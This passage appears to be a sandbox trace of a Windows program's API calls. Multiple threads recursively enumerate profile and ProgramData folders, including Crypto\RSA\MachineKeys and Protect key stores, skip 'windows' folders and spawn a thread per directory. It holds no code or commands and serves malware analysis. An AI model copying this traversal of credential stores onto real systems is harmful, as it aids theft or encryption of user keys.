lpThreadId=0x0) returned 0x2c0 [0049.139] CloseHandle (hObject=0x2c0) returned 1 [0049.139] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0049.139] lstrcmpW (lpString1=".", lpString2="Protect") returned -1 [0049.139] lstrcmpW (lpString1="..", lpString2="Protect") returned -1 [0049.139] lstrcmpiW (lpString1="windows", lpString2="Protect") returned 1 [0049.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0049.142] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned 50 [0049.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Protect" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect" [0049.142] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\*.*" [0049.142] GlobalMemoryStatus (in: lpBuffer=0x23d0fd10 | out: lpBuffer=0x23d0fd10) [0049.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24dceb20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0049.143] CloseHandle (hObject=0x2c0) returned 1 [0049.143] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0049.143] lstrcmpW (lpString1=".", lpString2="SystemCertificates") returned -1 [0049.143] lstrcmpW (lpString1="..", lpString2="SystemCertificates") returned -1 [0049.143] lstrcmpiW (lpString1="windows", lpString2="SystemCertificates") returned 1 [0049.145] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*" [0049.145] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\*.*") returned 50 [0049.145] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0049.145] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*.*" [0049.145] GlobalMemoryStatus (in: lpBuffer=0x23d0fd10 | out: lpBuffer=0x23d0fd10) [0049.145] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24de6b88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0049.147] CloseHandle (hObject=0x2c0) returned 1 [0049.147] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0049.147] lstrcmpW (lpString1=".", lpString2="Windows") returned -1 [0049.147] lstrcmpW (lpString1="..", lpString2="Windows") returned -1 [0049.147] lstrcmpiW (lpString1="windows", lpString2="Windows") returned 0 [0049.147] FindNextFileW (in: hFindFile=0x5e3130, lpFindFileData=0x23d0fd30 | out: lpFindFileData=0x23d0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0049.147] FindClose (in: hFindFile=0x5e3130 | out: hFindFile=0x5e3130) returned 1 Thread: id = 530 os_tid = 0xc8c [0047.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x23e4fd30 | out: lpFindFileData=0x23e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8810 [0047.486] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.486] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x23e4fd30 | out: lpFindFileData=0x23e4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.486] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.486] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.486] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x23e4fd30 | out: lpFindFileData=0x23e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0047.486] lstrcmpW (lpString1=".", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned -1 [0047.486] lstrcmpW (lpString1="..", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned -1 [0047.486] lstrcmpiW (lpString1="windows", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 1 [0047.486] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" [0047.486] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned 56 [0047.486] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0047.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0047.487] GlobalMemoryStatus (in: lpBuffer=0x23e4fd10 | out: lpBuffer=0x23e4fd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98fa9e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0048.408] CloseHandle (hObject=0x69c) returned 1 [0048.408] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x23e4fd30 | out: lpFindFileData=0x23e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0048.408] lstrcmpW (lpString1=".", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned -1 [0048.408] lstrcmpW (lpString1="..", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned -1 [0048.408] lstrcmpiW (lpString1="windows", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 1 [0048.408] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*" [0048.408] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*") returned 56 [0048.408] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\", lpString2="{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0048.409] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*" [0048.409] GlobalMemoryStatus (in: lpBuffer=0x23e4fd10 | out: lpBuffer=0x23e4fd10) [0048.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9762300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0048.423] CloseHandle (hObject=0x69c) returned 1 [0048.423] FindNextFileW (in: hFindFile=0x5d8810, lpFindFileData=0x23e4fd30 | out: lpFindFileData=0x23e4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0048.423] FindClose (in: hFindFile=0x5d8810 | out: hFindFile=0x5d8810) returned 1 Thread: id = 531 os_tid = 0xc90 [0047.488] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x23f8fd30 | out: lpFindFileData=0x23f8fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0047.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.488] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x23f8fd30 | out: lpFindFileData=0x23f8fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.488] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.488] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.488] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x23f8fd30 | out: lpFindFileData=0x23f8fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0047.488] FindClose (in: hFindFile=0x5db338 | out: hFindFile=0x5db338) returned 1 Thread: id = 532 os_tid = 0xc94 [0047.489] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x240cfd30 | out: lpFindFileData=0x240cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0047.489] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.489] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x240cfd30 | out: lpFindFileData=0x240cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.489] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.489] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.489] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x240cfd30 | out: lpFindFileData=0x240cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0047.489] lstrcmpW (lpString1=".", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned -1 [0047.489] lstrcmpW (lpString1="..", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned -1 [0047.489] lstrcmpiW (lpString1="windows", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 1 [0048.245] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" [0048.245] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned 54 [0048.245] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0048.245] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" [0048.245] GlobalMemoryStatus (in: lpBuffer=0x240cfd10 | out: lpBuffer=0x240cfd10) [0048.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245a9060, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d0 [0048.283] CloseHandle (hObject=0x6d0) returned 1 [0048.283] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x240cfd30 | out: lpFindFileData=0x240cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0048.284] lstrcmpW (lpString1=".", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned -1 [0048.284] lstrcmpW (lpString1="..", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned -1 [0048.284] lstrcmpiW (lpString1="windows", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 1 [0048.398] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*" [0048.398] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*") returned 54 [0048.398] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0048.398] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*" [0048.398] GlobalMemoryStatus (in: lpBuffer=0x240cfd10 | out: lpBuffer=0x240cfd10) [0048.398] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245c10c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x678 [0048.418] CloseHandle (hObject=0x678) returned 1 [0048.418] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x240cfd30 | out: lpFindFileData=0x240cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1d91b669, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 0 [0048.419] FindClose (in: hFindFile=0x5db338 | out: hFindFile=0x5db338) returned 1 Thread: id = 533 os_tid = 0xc98 [0047.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x2420fd30 | out: lpFindFileData=0x2420fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0047.490] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.490] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2420fd30 | out: lpFindFileData=0x2420fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfc65d150, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xfc65d150, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.490] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.490] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2420fd30 | out: lpFindFileData=0x2420fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0047.490] lstrcmpW (lpString1=".", lpString2="MachineKeys") returned -1 [0047.490] lstrcmpW (lpString1="..", lpString2="MachineKeys") returned -1 [0047.490] lstrcmpiW (lpString1="windows", lpString2="MachineKeys") returned 1 [0049.002] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" [0049.002] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned 47 [0049.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\", lpString2="MachineKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys" [0049.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*" [0049.002] GlobalMemoryStatus (in: lpBuffer=0x2420fd10 | out: lpBuffer=0x2420fd10) [0049.003] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24d6e980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0049.010] CloseHandle (hObject=0x428) returned 1 [0049.010] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x2420fd30 | out: lpFindFileData=0x2420fd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe5bc2f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xe5bc2f0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0049.010] lstrcmpW (lpString1=".", lpString2="S-1-5-18") returned -1 [0049.010] lstrcmpW (lpString1="..", lpString2="S-1-5-18") returned -1 [0049.010] lstrcmpiW (lpString1="windows", lpString2="S-1-5-18") returned 1 [0049.010] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" | out: 